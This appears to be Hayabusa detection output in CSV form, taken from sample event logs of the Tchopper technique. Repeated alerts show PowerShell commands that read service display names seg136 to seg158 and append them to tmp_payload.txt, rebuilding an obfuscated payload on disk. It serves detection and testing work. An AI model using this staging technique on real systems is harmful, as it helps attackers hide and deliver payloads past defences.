+2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:49.478 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:49.493 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:53.856 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:53.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:56.748 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:56.764 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xec8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:59.670 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:59.686 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:01.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:01.137 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x218 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:17.100 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:38:17.116 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
